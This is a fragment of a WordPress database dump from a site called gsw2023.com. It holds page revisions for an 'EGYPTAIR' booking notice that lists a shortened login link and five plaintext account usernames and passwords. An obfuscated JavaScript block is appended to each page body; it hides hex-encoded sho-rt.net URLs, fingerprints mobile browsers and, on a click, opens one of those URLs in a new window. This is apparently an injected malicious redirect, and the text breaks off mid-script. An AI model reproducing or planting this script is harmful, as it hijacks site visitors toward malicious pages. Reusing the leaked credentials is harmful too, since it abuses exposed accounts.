_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:40:22','2023-06-24 01:40:22','',3066,'https://gsw2023.com/?p=4803',0,'revision','',0),
(4804,1,'2023-06-24 01:46:32','2023-06-24 01:46:32','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph -->Good day,</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->​Kindly find hereunder link </p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->- Appreciate your kind support to direct users to login through:</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph -->- Link:  <a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noreferrer noopener\">https://bit.ly/3HLQBrB</a>  </p>\n<!-- /wp:paragraph -->\n<!-- wp:table -->\n<figure class=\"wp-block-table\">\n<table border=\"0\" width=\"100%\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td>\n<p><strong>UserName</strong></p>\n</td>\n<td>\n<p><strong>Password</strong></p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#1</p>\n</td>\n<td>\n<p>3Tt#4Hc0</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#2</p>\n</td>\n<td>\n<p>7Hi#4Ph2</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#3</p>\n</td>\n<td>\n<p>0Lx_0Py7</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#4</p>\n</td>\n<td>\n<p>6Cq_1Gl4</p>\n</td>\n</tr>\n<tr>\n<td>\n<p>ARABIAN AC#5</p>\n</td>\n<td>\n<p>2Ns_4Nn7</p>\n</td>\n</tr>\n</tbody>\n</table>\n</figure>\n<!-- /wp:table -->\n<p><!-- wp:paragraph -->​​​</p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>* Make sure to guide users to select Egypt from the country menu, then enter given username &amp; password and proceed with their bookings.</strong></p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','EGYPTAIR','','publish','closed','closed','','egyptair','','','2023-06-24 01:58:33','2023-06-24 01:58:33','',0,'https://gsw2023.com/?page_id=4804',0,'page','',0),
(4806,1,'2023-06-24 01:46:32','2023-06-24 01:46:32','<!-- wp:paragraph -->\n<p>Good day,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>​Kindly find hereunder link&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>-&nbsp;Appreciate your kind support to direct users to login through:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>- Link:&nbsp;&nbsp;<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noreferrer noopener\">https://bit.ly/3HLQBrB</a>&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td colspan=\"3\">UserNamePasswordARABIAN AC#13Tt#4Hc0ARABIAN AC#27Hi#4Ph2ARABIAN AC#30Lx_0Py7ARABIAN AC#46Cq_1Gl4ARABIAN AC#52Ns_4Nn7</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&nbsp;</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:paragraph -->\n<p>​​​</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>* Make sure to guide users to select&nbsp;Egypt&nbsp;from the country menu, then enter given username &amp; password and proceed with their bookings.</strong></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 